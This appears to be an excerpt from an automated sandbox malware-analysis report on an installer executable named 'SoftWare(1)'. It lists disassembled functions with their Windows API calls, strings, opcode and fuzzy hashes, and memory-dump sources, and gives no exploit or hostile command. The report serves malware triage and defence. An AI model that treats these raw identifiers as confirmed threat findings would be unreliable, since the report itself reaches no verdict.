                                                                                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:3.6%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:47
